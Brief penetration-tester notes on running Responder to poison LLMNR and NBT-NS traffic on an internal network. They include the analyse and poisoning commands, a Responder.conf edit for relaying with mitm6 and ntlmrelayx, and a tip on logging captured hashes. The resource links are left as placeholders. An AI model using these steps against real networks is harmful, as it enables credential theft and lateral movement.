Secondary Categories: 02-Credential Access, 02-Lateral Movement

Responder

When performing a internal network penetration test I usually start by running Responder in Analyze Mode to see if outdated protocols such as LLMNR and/or NBT-NS is utilized.

#Analyze Mode
responder -I eth0 -A
 
#Begin poisoning request
responder -I eth0

This can also be coupled with mitm6 to poison even more request.

Another great method is to utilize responder, mitm6, and ntlmrelayx to capture and relay credentials

If we are able to leverage LLMNR and NBT-NS then we can use other tools to further leverage this, but first we need to edit the Responder.conf file that is located at /usr/share/responder/Responder.conf

We need to change the SMB and HTTP from On to Off

# /usr/share/responder/Responder.conf
 
SQL = On
SMB = Off #   
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
  • It is optional, but highly recommended to log hashes to a file in addition to the method or tactic used during ntlmrelayx. You can log the hashes to a file use the -of flag in ntlmrelyx

Resources:

TitleURL
placeholder

Also Check Out:

  • PLACEHOLDER